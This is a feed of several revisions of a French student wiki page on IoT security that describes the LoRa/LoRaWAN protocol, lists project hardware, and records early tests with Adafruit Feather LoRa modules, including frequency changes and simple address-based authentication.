 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
= Changement de fréquence=&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
=Authentification =&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définies à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond, il renvoie un paquet avec l'adresse de l'émetteur.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35696</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35696"/>
				<updated>2016-12-07T10:17:42Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
= Changement de fréquence=&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35695</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35695"/>
				<updated>2016-12-07T10:00:53Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35694</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35694"/>
				<updated>2016-12-07T10:00:33Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
